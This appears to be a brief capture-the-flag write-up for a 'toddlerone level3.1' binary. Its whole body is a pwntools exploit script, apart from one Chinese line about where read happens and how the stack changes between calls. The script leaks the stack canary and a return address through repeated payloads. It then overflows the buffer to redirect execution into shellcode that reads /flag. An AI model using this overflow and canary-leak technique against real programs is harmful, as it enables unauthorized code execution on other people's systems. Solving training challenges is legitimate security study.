3.1

需要注意两个点，一个是read的位置，一个是每次启动challenge函数后栈的长度变化

from pwn import *
context.log_level='info'

r = process(["/challenge/toddlerone_level3.1"])

payload = asm(shellcraft.amd64.linux.cat('/flag'), arch='amd64')



payload1 = b'REPEAT' + b'a'*(0x28-6-8*2) + b'b'
r.sendlineafter(b'Payload size: ', str(len(payload1)))
r.sendafter(b'bytes)!\n', payload1)
print(r.recvuntil("aaaaaaaab"))
canary = u64(r.recv(7).rjust(8, b'\x00'))
log.success("canary => {}".format(hex(canary)))
# r.recvall()

payload2 = b'REPEAT' + b'a'*(0x28-6-8) + b'a'*0x10 + b'aaaaaaab'
log.info(str(payload2))
r.sendlineafter(b'Payload size: ', str(len(payload2)))
r.sendafter(b'bytes)!\n', payload2)
r.recvuntil('aaaaaaaab')
ret_addr = u64(r.recvline()[:-1].ljust(8, b'\x00'))
log.success("ret addr => {}".format(hex(ret_addr)))


payload3 = b'aaaaaa' + b'a'*(0x28-6-8*2) + p64(canary) + b'aaaaaaaa' + p64(ret_addr-0x1140-0x70*2+8) + payload
log.info(str(payload3))
r.sendlineafter(b'Payload size: ', str(len(payload3)))
r.sendafter(b'bytes)!\n', payload3)


r.interactive()

Q.E.D.